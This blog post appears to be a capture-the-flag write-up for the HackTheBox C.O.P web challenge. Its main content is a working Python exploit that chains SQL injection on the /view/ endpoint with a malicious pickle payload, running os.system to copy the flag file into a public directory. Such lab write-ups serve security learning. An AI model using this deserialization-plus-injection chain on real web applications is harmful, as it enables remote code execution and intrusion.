Post

HackTheBox C.O.P Challenge

Posted
By x3ric
1 min read

Explore the basics of cybersecurity in the C.O.P Challenge on Hack The Box. This easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

https://app.hackthebox.com/challenges/395

Description

The C.O.P (Cult of Pickles) have started up a new web store to sell their merch. We believe that the funds are being used to carry out illicit pickle-based propaganda operations! Investigate the site and try and find a way into their operation!

Exploitation

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47

#!/usr/bin/python3
import requests,pickle,base64,sys,os

def get_base_url():
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <ip:port>")
        sys.exit(1)
    host, port = sys.argv[1].split(':')
    return f"http://{host}:{port}"

class RCE:
    def __reduce__(self):
        return (os.system, (payload_command,))

def create_malicious_pickle():
    malicious_object = RCE()
    pickled_payload = pickle.dumps(malicious_object)
    encoded_payload = base64.urlsafe_b64encode(pickled_payload).decode('ascii')
    return encoded_payload

def inject_payload(encoded_payload):
    injection_url = f"{TARGET_URL}1' UNION SELECT '{encoded_payload}'-- "
    response = requests.get(injection_url)
    if response.status_code == 200:
        print("[+] Payload injected successfully.")
    else:
        print(f"[-] Injection failed with status code: {response.status_code}")
        print("Server response:", response.text)

def check_flag_file():
    response = requests.get(STATIC_FILE_URL)
    if response.status_code == 200:
        print("[+] Flag file accessed successfully!")
        print(response.text, end='')
    else:
        print("[-] Could not access the flag file. The exploit may not have worked.")

BASE_URL = get_base_url()
TARGET_URL = f"{BASE_URL}/view/"
STATIC_FILE_URL = f"{BASE_URL}/static/flag.txt"
payload_command = 'cp /app/flag.txt /app/application/static/flag.txt'

if __name__ == "__main__":
    encoded_payload = create_malicious_pickle()
    print(f"[+] Generated payload: {encoded_payload}")
    inject_payload(encoded_payload)
    check_flag_file()

Summary

C.O.P is an easy-level challenge on Hack The Box that combines insecure deserialization and SQL injection to achieve remote code execution (RCE). A malicious Python object is serialized using pickle and encoded in Base64. The payload is injected via an SQLi vulnerability in the view endpoint, executing a command to copy the flag file to a publicly accessible directory. The flag is then retrieved from the static directory, highlighting the risks of insecure deserialization and improper input sanitization in web applications.

challenge
htb challenge writeup linux web
This post is licensed under CC BY 4.0 by the author.